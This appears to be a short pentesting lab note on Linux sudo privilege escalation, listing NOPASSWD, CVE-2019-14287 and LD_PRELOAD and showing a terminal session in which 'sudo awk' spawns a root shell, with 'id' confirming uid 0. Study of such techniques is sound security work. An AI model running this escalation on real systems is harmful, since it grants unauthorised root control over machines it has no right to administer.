Sudo

NO PASSWD
CVE-2019-14287
LD_PRELOAD

NO PASSWORD

user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more
user@debian:~$ sudo awk 'BEGIN {system("/bin/sh")}'

https://gtfobins.github.io/gtfobins/awk/ (SUDO)


sh-4.1# id
uid=0(root) gid=0(root) groups=0(root)

PreviousPasswords NextSUID exploitation

Last updated 1 year ago